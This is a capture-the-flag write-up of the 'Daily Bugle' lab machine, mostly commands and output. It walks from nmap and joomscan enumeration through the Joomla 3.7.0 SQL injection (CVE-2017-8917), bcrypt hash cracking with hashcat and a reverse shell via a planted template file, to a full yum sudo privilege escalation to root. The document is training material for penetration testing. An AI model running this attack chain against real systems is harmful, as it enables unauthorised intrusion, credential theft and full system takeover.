Daily Bugle
Recon
Lets kick off the nmap scan and since we know this machine is running a website, lets visit the webpage from browser while scan is running.
1$ nmap -A -T4 -oN dailybugle.nmap.txt 10.10.185.129
2Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-27 12:51 EDT
3Nmap scan report for 10.10.185.129
4Host is up (0.081s latency).
5Not shown: 997 closed ports
6PORT STATE SERVICE VERSION
722/tcp open ssh OpenSSH 7.4 (protocol 2.0)
8| ssh-hostkey:
9| 2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
10| 256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
11|_ 256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
1280/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
13|_http-generator: Joomla! - Open Source Content Management
14| http-robots.txt: 15 disallowed entries
15| /joomla/administrator/ /administrator/ /bin/ /cache/
16| /cli/ /components/ /includes/ /installation/ /language/
17|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
18|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
19|_http-title: Home
203306/tcp open mysql MariaDB (unauthorized)
21
22Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
23Nmap done: 1 IP address (1 host up) scanned in 18.51 seconds
24
Note:
- Mysql on 3306
- Apache 2.4.6 on port 80, running a joomla site
- Also note the possible directory list blocked by robots.txt file
Enumeration
If you do not already have it, download joomscan script to enumerate the joomla site.
git clone https://github.com/rezasp/joomscan.git
1$ perl ./joomscan.pl --url=http://10.10.185.129 -jv
2
3
4Processing http://10.10.185.129 ...
5
6
7
8[+] Detecting Joomla Version
9[++] Joomla 3.7.0
10
11
12Your Report : reports/10.10.185.129/
And, the full report looks like this -
1 ____ _____ _____ __ __ ___ ___ __ _ _
2 (_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
3 .-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) (
4 \____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
5 (1337.today)
6
7 --=[OWASP JoomScan
8 +---++---==[Version : 0.0.7
9 +---++---==[Update Date : [2018/09/23]
10 +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
11 --=[Code name : Self Challenge
12 @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP
13
14Processing http://10.10.185.129 ...
15
16
17
18[+] FireWall Detector
19[++] Firewall not detected
20
21[+] Detecting Joomla Version
22[++] Joomla 3.7.0
23
24[+] Core Joomla Vulnerability
25[++] Target Joomla core is not vulnerable
26
27[+] Checking Directory Listing
28[++] directory has directory listing :
29http://10.10.185.129/administrator/components
30http://10.10.185.129/administrator/modules
31http://10.10.185.129/administrator/templates
32http://10.10.185.129/images/banners
33
34
35[+] Checking apache info/status files
36[++] Readable info/status files are not found
37
38[+] admin finder
39[++] Admin page : http://10.10.185.129/administrator/
40
41[+] Checking robots.txt existing
42[++] robots.txt is found
43path : http://10.10.185.129/robots.txt
44
45Interesting path found from robots.txt
46http://10.10.185.129/joomla/administrator/
47http://10.10.185.129/administrator/
48http://10.10.185.129/bin/
49http://10.10.185.129/cache/
50http://10.10.185.129/cli/
51http://10.10.185.129/components/
52http://10.10.185.129/includes/
53http://10.10.185.129/installation/
54http://10.10.185.129/language/
55http://10.10.185.129/layouts/
56http://10.10.185.129/libraries/
57http://10.10.185.129/logs/
58http://10.10.185.129/modules/
59http://10.10.185.129/plugins/
60http://10.10.185.129/tmp/
61
62
63[+] Finding common backup files name
64[++] Backup files are not found
65
66[+] Finding common log files name
67[++] error log is not found
68
69[+] Checking sensitive config.php.x file
70[++] Readable config files are not found
71
72
73Your Report : reports/10.10.185.129/
74
Lets search for joomla vulnerabilities with version 3.7.0
1$ searchsploit joomla 3.7.0
2------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
3 Exploit Title | Path
4------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
5Joomla! 3.7.0 - 'com_fields' SQL Injection | php/webapps/42033.txt
6Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting | php/webapps/43488.txt
7------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
8Shellcodes: No Results
9
Looks like this version is vulnerable for sql-injection type attacks.
1$ head -10 /usr/share/exploitdb/exploits/php/webapps/42033.txt
2# Exploit Title: Joomla 3.7.0 - Sql Injection
3# Date: 05-19-2017
4# Exploit Author: Mateus Lino
5# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
6# Vendor Homepage: https://www.joomla.org/
7# Version: = 3.7.0
8# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
9# CVE : - CVE-2017-8917
Exploit
Searched github for the vulnerability CVE-2017-8917 and came across the joomblah script at https://github.com/stefanlucas/Exploit-Joomla/blob/master/joomblah.py
1$ python ./joomblah.py http://10.10.23.102
2
3 .---. .-'''-. .-'''-.
4 | | ' _ \ ' _ \ .---.
5 '---' / /` '. \ / /` '. \ __ __ ___ /| | | .
6 .---.. | \ ' . | \ ' | |/ `.' `. || | | .'|
7 | || ' | '| ' | '| .-. .-. '|| | | < |
8 | |\ \ / / \ \ / / | | | | | ||| __ | | __ | |
9 | | `. ` ..' / `. ` ..' / | | | | | |||/'__ '. | | .:--.'. | | .'''-.
10 | | '-...-'` '-...-'` | | | | | ||:/` '. '| |/ | \ | | |/.'''. \
11 | | | | | | | ||| | || |`" __ | | | / | |
12 | | |__| |__| |__|||\ / '| | .'.''| | | | | |
13 __.' ' |/'..' / '---'/ / | |_| | | |
14| ' ' `'-'` \ \._,\ '/| '. | '.
15|____.' `--' `" '---' '---'
16
17 [-] Fetching CSRF token
18 [-] Testing SQLi
19 - Found table: fb9j5_users
20 - Extracting users from fb9j5_users
21 [$] Found user ['811', 'Super User', 'jonah', '[email protected]', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']
22 - Extracting sessions from fb9j5_session
23
Looks like we found a user called “jonah” and the hashed password.
Using hashcat, we can crack the hash. I passed the hashed mode as 3200 as the hash looks a lot like unix hash on this page - https://hashcat.net/wiki/doku.php?id=example_hashes (Note: The $2x$ format gives it away.)
1# hashcat -m 3200 ./jonah-password.txt /usr/share/wordlists/rockyou.txt
2
3
4Session..........: hashcat
5Status...........: Running
6Hash.Name........: bcrypt $2*$, Blowfish (Unix)
7Hash.Target......: $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p...BtZutm
8Time.Started.....: Sun Sep 27 17:13:14 2020 (13 mins, 7 secs)
9Time.Estimated...: Thu Oct 1 07:41:12 2020 (3 days, 14 hours)
10Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
11Guess.Queue......: 1/1 (100.00%)
12Speed.#1.........: 46 H/s (11.09ms) @ Accel:4 Loops:64 Thr:1 Vec:8
13Recovered........: 0/1 (0.00%) Digests
14Progress.........: 36328/14344385 (0.25%)
15Rejected.........: 0/36328 (0.00%)
16Restore.Point....: 36328/14344385 (0.25%)
17Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:512-576
18Candidates.#1....: Kathleen -> Dominic
19
20$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm:XXXXXXXXXX
21
22Session..........: hashcat
23Status...........: Cracked
24Hash.Name........: bcrypt $2*$, Blowfish (Unix)
25Hash.Target......: $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p...BtZutm
26Time.Started.....: Sun Sep 27 17:13:14 2020 (16 mins, 54 secs)
27Time.Estimated...: Sun Sep 27 17:30:08 2020 (0 secs)
28Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
29Guess.Queue......: 1/1 (100.00%)
30Speed.#1.........: 46 H/s (10.71ms) @ Accel:4 Loops:64 Thr:1 Vec:8
31Recovered........: 1/1 (100.00%) Digests
32Progress.........: 46840/14344385 (0.33%)
33Rejected.........: 0/46840 (0.00%)
34Restore.Point....: 46832/14344385 (0.33%)
35Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:960-1024
36Candidates.#1....: staffy -> sorriso
37
http://10.10.224.69/templates/protostar/shell.php?1601256492
1$ nc -lvnp 9000
2listening on [any] 9000 ...
3connect to [10.6.19.215] from (UNKNOWN) [10.10.224.69] 49000
4Linux dailybugle 3.10.0-1062.el7.x86_64 #1 SMP Wed Aug 7 18:08:02 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
5 21:32:05 up 30 min, 0 users, load average: 0.00, 0.01, 0.05
6USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
7uid=48(apache) gid=48(apache) groups=48(apache)
8sh: no job control in this shell
9sh-4.2$
we can read /etc/passwd and notice that jonah’s linux account id is probably jjameson. Then I found the password for root user in the configuration.php file in the /var/www/html
1sh-4.2$ pwd
2/var/www/html
3pwd
4sh-4.2$ ls -l configuration.php
5ls -l configuration.php
6-rw-r--r-- 1 apache apache 1982 Dec 14 2019 configuration.php
7sh-4.2$
You can try to ssh into the machine using root user (Remember the ssh port 22 is open.) with this password, however it does not work. Try Jonah’s and it seemed to work.
1$ ssh [email protected]
2[email protected]'s password:
3Permission denied, please try again.
4[email protected]'s password:
5Last failed login: Sun Sep 27 21:40:57 EDT 2020 from ip-10-6-19-215.eu-west-1.compute.internal on ssh:notty
6There was 1 failed login attempt since the last successful login.
7Last login: Mon Dec 16 05:14:55 2019 from netwars
8[jjameson@dailybugle ~]$ cat user.txt
9XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
10[jjameson@dailybugle ~]$
11
1$ scp linpeas.sh [email protected]:/tmp/
2[email protected]'s password:
3linpeas.sh 100% 288KB 666.1KB/s 00:00
4
Post-Exploitation/Privesc
Searched for possible ways to exploit yum binary as a non-root user. Here is how you can easily escalate the privileges and capture the root flag.
1[jjameson@dailybugle tmp]$ cd
2[jjameson@dailybugle ~]$ TF=$(mktemp -d)
3[jjameson@dailybugle ~]$ cat >$TF/x<<EOF
4> [main]
5> plugins=1
6> pluginpath=$TF
7> pluginconfpath=$TF
8> EOF
9[jjameson@dailybugle ~]$ cat >$TF/y.conf<<EOF
10> [main]
11> enabled=1
12> EOF
13[jjameson@dailybugle ~]$ cat >$TF/y.py<<EOF
14> import os
15> import yum
16> from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
17> requires_api_version='2.1'
18> def init_hook(conduit):
19> os.execl('/bin/sh','/bin/sh')
20> EOF
21[jjameson@dailybugle ~]$ sudo yum -c $TF/x --enableplugin=y
22Loaded plugins: y
23No plugin match for: y
24sh-4.2# id
25uid=0(root) gid=0(root) groups=0(root)
26sh-4.2# cat /root/root.txt
27XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
28sh-4.2#
This is a great machine, I was able to solve this without any help and I thoroughly enjoyed it.